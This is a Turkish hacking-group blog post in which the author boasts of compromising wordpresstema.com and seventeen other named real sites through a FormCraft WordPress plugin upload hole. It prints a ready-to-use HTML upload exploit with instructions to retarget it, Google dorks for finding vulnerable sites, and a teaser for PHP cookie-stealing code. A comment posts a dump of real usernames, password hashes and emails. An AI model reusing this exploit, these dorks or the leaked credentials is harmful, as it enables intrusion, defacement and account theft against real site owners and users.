WordpressTema.Com // CrimeStory

-
CrimeStory Yazı Dizisine devam Ediyoruz..
Bu Siteyi hedef Almaktaki Amacım tema dosyalarına backdoor enjekte edip tema kullanan diğer web yayıncılarını hacklemekti..
Fakat sistemde bunun için yeterli güvenlik açığı olmadığı için bu defa sadece txt dosyası eklemek ile yetindim..

http://golgeler.net/view-%3E388921

Hikayeyi Baştan Anlatayım..
Siteyi test Etmeye scripti Bulmaktan başladım.
zaten site tasarımından kendini ifşa ediyordu..
Sitede Wordpress Kullanılmıştı.
Wordpress de bulunan güncel bir güvenlik açığı yok...
Fakat yayıncıların kullandığı (theme-plugins) gibi üçüncü taraf uygulamalarda güvenlik açığı olabilir.
Bunu Test etmek için linux'da wpscan aracı var..
Fakat Ben Windows kullandığım için (https://hackertarget.com/wordpress-security-scan/) aracını kullanmayı tercih ettim.


[+]Formcraft
[+]download-manager

Bu iki aracıda Exploit Db'de aradığımda.
Formcraft aracında daha önceden bulunmuş ve post yöntemiyle dosya upload etmeye yarayan bir açık farkettim.
Bu açığı istismar etmek için kullanılan html kodlarını kullanarak sisteme "a.txt" adında İçinde "Hacked By CrimeCrew" Yazan bir metin eklemeyi başardım..
Fakat Sisteme shell Atıp root olmayı denediğimde aynı sonucu alamadım..
Muhtemelen upload sayfası sadece belirli formatlara yanıt veriyordu..
TamperData İle denediğimde Sonuç Yine hüsran Oldu..
Ancak Sonuç Olarak Kullandığı Plugins Yüzünden Wordpresstema.com hacklendi.

Daha Sonra Dork Yazarak Aynı Scripti Formcraft'ı kullanan diğer sistemleri Bulup Onlarıda Hackledim..
18 site hackledikten sonra aynı exploiti kullanmaktan sıkıldım.

<html>
<Head>
<title>CrimeCrew Uploader</title>
<text>Wordpress Exploit // FormCraft</text>
<form method="POST" action="http://www.wordpresstema.com//wp-content/plugins/formcraft/file-upload/server/content/upload.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
</Head>
</html>

Exploit'te Koyu yazılı kısmı değiştirip html olarak kaydedip istediğiniz formcraft kullanan siteye dosya upload edebilirsiniz..
Formcraft Kullanan diğer siteleri bulmak için;
intext:"powered by formcraft" 
inurl:plugins/formcraft 
Dorklarını Kullanabilirsiniz..

 Gelecek Story'lerde Görüşmek Üzere..

 Hacklediğim Diğer Siteler

 http://www.sosyalimci.com
http://www.pusulaswiss.ch
http://bursaceviritercume.com
http://cansigorta.org
http://urper.com.tr
http://www.darmanas.com
http://www.the-resume-coach.com
http://www.risetreeconsultancy.com
http://goldeneggrecruitment.co.uk
http://mission4recruitment.com
http://www.weighandwin.com
http://www.sevikmakina.com.tr
http://stoller.com.tr
https://inspirechanges.com
http://welcomehomecoalition.org
http://www.spageddiesitaliankitchen.com
http://www.gravitytrails.com
http://www.wordpresstema.com


Yorumlar

  1. Faraday25 Mayıs 2016 06:24

    http://kariyer.izu.edu.tr/wp-content/plugins/formcraft/file-upload/server/content/files/15745a55402c8d---Hacked.txt

    İstanbul Zaim Üniverstesi Uyarıldı..

    https://twitter.com/CrimeCrewTr/status/735459761542553600

    YanıtlaSil
  2. New Account17 Haziran 2016 04:24

    +------------+--------------+------------------------+
    | username | password | email |
    +------------+--------------+------------------------+
    | ertan | wszmyselkpOl | ertanyildiz@live.com |
    | hakan | xMLlxs3ewpI= | hakan@casella.com.tr |
    | admin | mZKlkpim | info@aktifinternet.com |
    | aktifmedya | mZKlkpim | info@aktifmedya.net |
    | casella | wszmysfV1MTf | info@casella.com.tr |
    | ismail | lJKplQ== | ismail@aktifmedya.net |
    | selcuk | xMLlxs3ewpI= | selcuk@casella.com.tr |
    +------------+--------------+------------------------+
    Başkan bişeyler yapmaya çalıştım olmuşmu? Cevap verirsen sevinirim.

    YanıtlaSil
  3. New Account17 Haziran 2016 04:26

    http://i.hizliresim.com/jnQnGL.png

    YanıtlaSil
    Yanıtlar
    1. Unknown9 Temmuz 2016 10:16

      Afferin..

      Sil
    2. Unknown9 Temmuz 2016 12:08

      Linux kullanabiliyorsan daha iyi şeyler yapabilirsin kali linux taki yazılımları kurmaya bak.

      Sil
  4. Adsız13 Temmuz 2016 09:12

    S.a. Blogundaki yazıları gördüm ve çok beğendim uzun zamandır seni takip ediyorum. CrimeCrew e katılmak istiyorum. Yaşım 17 11. Sınıftayım. Beni kabul edersen iyi şeyler başaracağımızı düşünüyorum. Saygılar...
    Facebook hesabına mesaj attım bu arada.

    YanıtlaSil

Yorum Gönder

Bu blogdaki popüler yayınlar

XSS Cookie Çalma

-
Selamın Aleykün Uzun Soluklu anlatımlara Tekrardan dewam Ediyorum.. Bloguma sıradan bir okuyucu olarak giriş yaptığımda makalelerin çok kısa ve anlaşılmaz olduğunu farkettim.. Not defteride öyledir değilmi sadece yazan anlasa yeterli olur.. Ancak okuyucu Faktörünü Göz Önüne Alarak yazmaya dewam edeceğim inşşallah.. Şimdi sizinle beraber bir site kuracağız.. Bu site saldırımızda bize yardımcı olacak.. Ben sitenin adını Taşıyıcı koymak istiyorum.. Çünkü site cookie bilgilerini bize taşımakla görevli.. Sitemizin adı:[ http://Tasiyici.com ] Bu gerçek bir domain değil anlaşılır olması adına bu ismi kullanıyorum.. Umarım daha önce web sitesi kurmuşsunuzdur.. Çünkü o konuya girersek işin içinden çıkamayız.. Ben direkt olarak php kodunu vereceğim.. <php? $cookie = $_GET[’data’]; $kime = "Buraya Mail Adresimiz yazılacak.."; $konu = "cookie"; mail ($kime,$konu,$cookie); ?> Bu kodlar php kodlarıdır.. Bilgisayarınızda çalışmazlar.. Bunları bir web
Devamı

Adli Bilişim Programları

-
Evet Arkadaşlar yeni Bir Yazı İle Karşınızdayım.. Bu Yazıda Konu Bir Sistemi Hacklemek yada sistemden Veri Sızdırmak Deil.. Hacker Olmak istiyoruz değil mi.. Bu İşte Kararlıyız.. En Baştan söyleyeyim bu İş çook tehlikelidir.. Bir Anda Kapı Çalınır.. Açarsın Polis.. Adını? Sorarlar.. Benim Dersin.. Tutuklusunuz Derler.. Afallarsın.. Bilgisayarına El Koyarlar.. Ne Oluyo Yaw.. Dersin.. Seni Emniyette Memnun edeceklerini söylerler.. Hiç bir soruya tatmin edici bir cevap vermezler.. Dahası Küfrederler.. Telefonuna El Koyarlar.. Şimdi dersiniz ki ne anlatıyo bu.. Hangi Film.. Film deil arkadaşlar.. İş ciddi.. Dolandırıcılıklar.. Hırsızlıklar Artık Bilgisayar Üzerinden Gayet Kolay yapılabiliyor.. Kim mi Yapıyor.. Hackerlar.. Bilgisayar Dehaları.. Ve Bazende Benim gibi Bilgisayar Sapıkları.. Hackerlar Ve Bilgisayar Dehaları Zaten Çook Akıllı Oldukları İçin yakalanmayacak stratejiler Kullanırlar.. Benim Gibilerse biraz Daha Geç İdrak Eder.. Kullanıcı Bilgilerini..
Devamı

FTK Imager yazılımı kullanılarak image almak

-
Resim
-== GİRİŞ ==- Image Almak Ne demektir ? Image ingilizcede resim anlamına gelmektedir. Ancak adli bilişim penceresinden bakarsak bunun faklı bir anlamı vardır. Kelime bu anlamı ilk anlamından ötürü kazanmış olabilir. Adli Bilişim Dijital Delillerin incelenmesini ve korunmasını konu alan yeni bir disiplindir. Filmlerde olay yeri inceleme ekiplerinin olay mahaline vardıklarında kurban'nın ve olay yerinin detaylı fotoğraflarını çektiklerini görmüşüzdür. Bunu olay yerini yada kurbanı daha sonra bozulmadan inceleme fırsatı bulabilmek için yaparlar. Çünkü kendileri olay mahâlinden ayrıldıktan sonra bir takım deliller zamana bağlı olarak zarar görebileceği gibi birileri tarafındanda karartılabilir. Aynı olasılıklar dijital deliller içinde geçerlidir. Bu nedenle olay mahaline varıldığında kurbanın yada failin,(fotoğrafını çektiğiniz sırada bunu bilemeyebilirsiniz) (her iki durumda da zanlının(aslında zanlıya ait olan depolama aygıtının)) fotoğrafını çekmeniz gerekir. Bu
Devamı